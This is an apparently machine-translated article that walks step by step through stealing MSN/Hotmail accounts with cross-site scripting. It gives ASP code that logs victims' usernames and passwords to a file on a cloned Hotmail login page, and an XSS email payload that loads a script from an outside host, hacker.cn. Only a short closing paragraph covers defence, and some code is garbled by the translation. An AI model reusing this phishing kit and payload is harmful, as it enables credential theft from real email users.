Instance profiling "Cross-Site intrusion" to prevent loss of MSN accounts

Last time we introducedWhat isCross-Site attack(Cross Site Scripting)Today, let's take a look at a specific instance and introduce how to avoid cross-site attacks.

　　"Cross-Site intrusion" Crime reproduction: Cross-Site intrusion of MSN account theft

Based on the clues provided by netizens, we restored the loss of their MSN accounts and deduced how hackers stole their MSN accounts.

Step 1: A hacker must first create a forged webpage that is the same as the Hotmail logon interface. Log on to the official website of Hotmail, click "file" in the menu bar, and select "Save as" from the drop-down menu to save the webpage. Then, use the webpage editing program such as Dreamweaver to open the saved webpage (Figure 1), find the location where the user name and password are entered, and add the following username and password theft code:

Figure 1

<%
Bbsuser = request ("bbsuser ")
Bbspwd = request ("bbspwd ")
Set fs = server. CreateObject ("Scripting. FileSystemObject ")
// Enable the file service
Set file = fs. OpenTaxtFile (server. MapPath ("Hotmail.txt"), 8, True)
// Create and open "Hotmail.txt"
File. writeline bbsuser + "----" + bbspwd
// Write the obtained username and password to "Hotmail.txt"
File. close
Set file = nothing
Set fs = nothing
%>

Then, modify the local link address and related parameters on the original Hotmail page so that the images can be properly displayed. Finally, save the webpage as "index. asp" and upload it to the hacker's website.

Step 2: The camouflage page is ready. Next, hackers will create cross-site Hotmail emails. Generally, hackers choose software that can directly edit HTML code in the email, such as DreamMail. After starting DreamMail, create an email address that supports POP3.

Then, click the "switch to deluxe edition" option in "View" on the DreamMail menu bar, and use DreamMail to create an HTML blank email. Right-click the email content page and choose "Edit HTML source code ", in the pop-up HTML source code editing window, enter the following XSS cross-site code:

<Font color = "ffffff">
<Div id = "jmp" style = "display: none"> nop </div>
<Div id = "ly" style = "display: none"> function OK () {return true}; window. onerror = OK </div>
<Div id = "tip" title = "<a style =" display: none ">" style = "display: none"> </div>
<Div id = "tap" title = "<" style = "display: none"> </div>
<Div id = "tep" title = ">" style = "display: none"> </div>
<Style> div {background-image: expression (Javascript: 1? Document. write (connector +; top: + EC_tap.title +/a + EC_tep.title + EC_tap.title + script id = nop + EC_tep.title + connector + EC_tap.title +/script + EC_tep.title + EC_tap.title + script src = http://www.hacker.cn/test/index.asp? Uid = miaodeyu@Hotmail.com + EC_tep.title + EC_tap.title +/script + EC_tep.title): 1 = 1) ;}</style> </font>

In this Code, hackers will change the "http://www.hacker.cn/test/index.asp? Uid = miaodeyu@Hotmail.com. After the email is edited, click "OK" to complete the cross-site email creation.

Step 3: The hacker will give his email a loud and attractive name, and then send it to the victim's MSN mailbox. When the victim uses Hotmail to view the email, the Hotmail logon box will pop up to trick you into entering your account and password to log on. If the victim is weak, he will enter the account and password on the malicious page. The information is not sent to the Microsoft server, but to the hacker quietly (figure 2 ).

　　

Figure 2

　　Cross-Site defense Solution

To prevent cross-site XSS attacks, it is best for common users to disable the JavaScript function of the browser, except for not clicking unfamiliar communications and network links. In addition, you can set the security level of IE to the highest level to prevent Cookie Theft. When creating webpages, website administrators should filter out special characters entered by users to avoid most XSS attacks. If a network manager finds a cross-site attack on his website, it must promptly fix the Cross-Site program.